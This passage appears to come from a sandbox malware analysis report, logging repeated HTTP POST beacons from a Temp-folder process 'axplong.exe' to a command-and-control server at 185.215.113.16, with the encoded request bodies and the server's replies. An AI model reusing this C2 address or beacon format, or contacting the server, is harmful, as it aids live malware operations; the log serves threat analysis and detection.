                    Sep 27, 2024 01:29:24.798696995 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:25.032542944 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    20 | 192.168.2.7 | 49727 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:25.272520065 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:25.993844032 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:25 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:26.019258022 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:26.249974966 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:26 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    21 | 192.168.2.7 | 49728 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:26.368300915 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:27.500171900 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:26 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:27.500407934 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:26 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:27.501046896 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:27.731050014 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:27 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    22 | 192.168.2.7 | 49729 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:27.852840900 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:28.542624950 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:28 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:28.557410955 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:28.932651997 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:28 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    23 | 192.168.2.7 | 49730 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:29.041997910 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:29.761863947 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:29 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:29.763020039 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:30.196727991 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:29 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    24 | 192.168.2.7 | 49731 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:30.321341038 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:31.151405096 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:31 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:31.152122021 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:31.375447989 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:31 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    25 | 192.168.2.7 | 49732 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:31.494915009 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:32.204375982 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:32 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:32.205123901 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:32.433598042 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:32 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    26 | 192.168.2.7 | 49733 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:32.540627003 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:33.258707047 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:33 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:33.298801899 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:33.526134968 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:33 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    27 | 192.168.2.7 | 49734 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:33.646493912 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:34.345848083 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:34 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:34.346648932 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:34.568824053 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:34 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    28 | 192.168.2.7 | 49735 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:34.680780888 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:35.538794041 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:35 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:35.539658070 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:35.771563053 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:35 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    29 | 192.168.2.7 | 49736 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:35.884841919 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:36.602411985 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:36 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:36.603429079 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:36.834774017 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:36 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    30 | 192.168.2.7 | 49737 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:36.946696043 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:37.658889055 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:37 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:37.659717083 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:37.890383005 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:37 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    31 | 192.168.2.7 | 49738 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:38.012145996 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:38.738380909 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:38 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:38.795332909 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:39.019455910 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:38 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    32 | 192.168.2.7 | 49739 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:39.189030886 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:39.890763044 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:39.892138958 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:40.119652033 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    33 | 192.168.2.7 | 49740 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:40.227973938 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:40.935679913 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:40.936345100 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:41.162904024 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    34 | 192.168.2.7 | 49741 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:41.278381109 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:41.972136974 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
